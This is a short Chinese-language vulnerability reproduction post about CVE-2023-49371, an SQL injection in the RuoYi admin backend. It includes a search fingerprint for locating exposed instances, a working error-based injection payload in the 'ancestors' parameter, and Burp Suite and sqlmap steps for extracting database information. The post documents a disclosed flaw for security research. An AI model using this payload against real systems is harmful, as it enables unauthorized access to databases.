免责声明
由于传播、利用WK安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负
责,WK安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除
并致歉。谢谢!
| 0x01 产品介绍
若依是一款基于Spring Boot 2.5.5、Spring Cloud 2020.0、OAuth2与JWT鉴权等核心技术的快速开发平台。它不仅支持Spring Security、Apache Shiro等多种安全框架,还整合了Mybatis、JPA等流行持久化框架。此外,若依提供了许多常用的功能模块,如系统管理、监控管理、任务调度、代码生成、文件上传和高德地图等功能。
| 0x02 影响版本
RuoYi <= v4.6
| 0x03 语法特征
app:"RuoYi"
| 0x04 漏洞复现
漏洞存在于后台
POC
Boby: DeptName= 1&deptid =100&ParentId=12&Status= 0&ordernum =1&ancestors=0)or(extractvalue(1,concat((select user())))); #
使用burpsuite抓包,保存数据包,然后使用poc注入获取数据库信息
可以保存数据包并将其注入到sqlmap中以获取更多数据库信息(右括号)
参考链接
https://github.com/Maverickfir/RuoYi-v4.6-vulnerability/blob/main/Ruoyiv4.6.md
原文始发于微信公众号(WK安全):【漏洞复现】CVE-2023-49371 | RuoYi SQL注入
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论